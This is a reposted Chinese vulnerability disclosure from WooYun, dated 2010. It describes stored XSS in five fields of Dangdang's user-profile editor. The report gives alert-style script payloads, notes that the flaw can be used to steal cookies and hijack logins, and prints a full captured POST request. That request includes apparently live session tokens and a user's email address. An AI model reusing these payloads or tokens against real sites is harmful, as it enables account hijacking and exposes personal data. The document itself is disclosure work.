当前位置:七道奇文章资讯安全技术网络技术
日期:2010-08-25 01:33:00  来源:本站整理

当当网多处存储型XSS漏洞及修复[网络技术]

赞助商链接



  本文“当当网多处存储型XSS漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
漏洞标题: 当当网多处存储型XSS漏洞
相关厂商: 当当网
漏洞作者: riusksk
提交时间: 2010-08-22
公开时间: 2010-08-22
漏洞范例: 跨站脚本攻击
危害等级: 中
漏洞状况: 未接洽到厂商大概厂商主动忽视
漏洞根源: http://www.wooyun.org
漏洞详情
扼要描写:

当当网存在多处存储型XSS漏洞
具体阐明:

在当当网的编辑个人档案中存在5处XSS漏洞,前4处罚别呈目前博客地址、爱好爱好、喜好或赏识的人和自我介绍中,向其写入XSS语句 <script>alert(/1/)</script> 都可被履行,别的一处呈目前昵称中,由于有长度限制,因此可通过本地构造POST表单来提交 </title><script>alert(/1/)</script> 履行js脚本,用于盗取用户cookie并仿冒用户登录.


漏洞证明:

Host=customer.dangdang.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 (BT-beachlife) Firefox/3.6.8
Accept=text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=zh-cn,zh;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://customer.dangdang.com/profile/Myarchives.php?save=ok
Cookie=__permanent_id=20100203235038955135819263359204968; __new_p_id=1; __ozlvd=1282408219; producthistoryname=Windows%C4%DA%BA%CB%CA%B5%D1%E9%BD%CC%B3%CC%28%B8%BD%B9%E2%C5%CC
%29%2CWeb+%B0%B2%C8%AB%B2%E2%CA%D4%2CWeb%C8%EB%C7%D6%B0%B2%C8%AB%B2%E2%CA%D4%D3%EB%B6%D4%B2%DF%A3%A8%B8%BDCD-ROM%B9%E2%C5%CC%D2%BB%D5%C5%A3%A9%2CSQL%D7%A2%C8%EB%B9%7747.net%BB%F7%D3%EB
%B7%C0%D3%F9%A3%A8%B0%B2%C8%AB%BC%BC%CA%F5%BE%AD%B5%E4%D2%EB%B4%D4%A3%A9%2CPHP%BA%CDMySQL+Web%BF%AA%B7%A2+%A3%A8%D4%AD%CA%E9%B5%DA4%B0%E6%A3%A9%2CWEB%B0%B2%C8%AB%CA%D6%B2%E1%2C
%BB%D2%C3%B1%B9%7747.net%BB%F7%B0%B2%C8%AB%CA%D6%B2%E1%A1%AA%A1%AA%C9%F8%CD%B8%B2%E2%CA%D4%D3%EB%C2%A9%B6%B4%B7%D6%CE%F6%BC%BC%CA%F5%2C%BA%DA%BF%CD%B9%7747.net%B7%C0%BC%BC%CA
%F5%B1%A6%B5%E4%3A+Web%CA%B5%D5%BD%C6%AA%2C%CD%F8%C2%E7%C9%F8%CD%B8%B2%E2%CA%D4%A3%AD%B1%A3%BB%A4%CD%F8%C2%E7%B0%B2%C8%AB%B5%C4%BC%BC%CA%F5%A1%A2%B9%A4%BE%DF%BA%CD%B9%FD%B3%CC%2C
%CD%F8%C2%E7%B0%B2%C8%AB%C6%C0%B9%C0%A3%A8%B5%DA%B6%FE%B0%E6%A3%A9; 
producthistoryid=683764%2C20810140%2C9222047%2C20848476%2C20546846%2C9150871%2C9272693%2C20653653%2C20080185%2C20842796; validatedflag=0; cart_id=1005102129448895; 
__utma=263274265.1985588993.1278076754.1282149439.1282284535.9; __utmz=263274265.1282284535.9.4.utmcsr=product.dangdang.com|utmccn=(referral)|utmcmd=referral|utmcct=/product.aspx; 
HK=web%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3B%25B0%25B2%25C8%25AB%25C2%25A9%25B6%25B4%25D7%25B7%25D7%25D9%3BWEB%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3Bsql
%25D7%25A2%25C8%25EB%3BWeb%25C8%25EB%25C7%25D6%3B%25C9%25F8%25CD%25B8%3B%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB
%25B0%25B2%25C8%25AB; from=488-133054; cart_db_index=3; cart_items_count=0; ck_db_index=3; is_new=1; __trace_id=20100822000612281259688254741795619; agree_date=1; 
login.dangdang.com=.AYH=100822001255147579&.ASPXAUTH=I3swGtBNKlIZFcNLIaO4tWX30HRxb+KI; LD=raSYRlzfovLiO635sEBP0drFJ8zWhCcs; 
dangdang.com=email=NzczMDgxODc4QHFxLmNvbQ==&nickname=&display_id=5533648947491&customerid=

uGQo9p1MXgQ4TwpLZdhuKw==&viptype=4+AtZiSmtFY=&show_name=
%u0037%u0037%u0033%u0030%u0038%u0031%u0038%u0037%u0038; email=773081878%40qq.com; nickname=
Content-Type=multipart/form-data; boundary=---------------------------97891525516423
Content-Length=2559
POSTDATA =-----------------------------97891525516423
Content-Disposition: form-data;
3
-----------------------------97891525516423
Content-Disposition: form-data; ; filename=""
Content-Type: application/octet-stream
-----------------------------97891525516423
Content-Disposition: form-data;
-----------------------------97891525516423
Content-Disposition: form-data;
27019229
-----------------------------97891525516423
Content-Disposition: form-data;
p3h4ck
-----------------------------97891525516423
Content-Disposition: form-data;
ctl04
-----------------------------97891525516423
Content-Disposition: form-data;
1
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
188
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
Rd_sex_1
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
student
-----------------------------97891525516423
Content-Disposition: form-data;
±¾¿ÆÉú
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/1/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/2/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/3/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/4/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
±£´æ»ù±¾ÐÅÏ¢
-----------------------------97891525516423--

修复筹划:

过滤跨站关键字


  以上是“当当网多处存储型XSS漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 当当网多处存储型XSS漏洞及修复
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .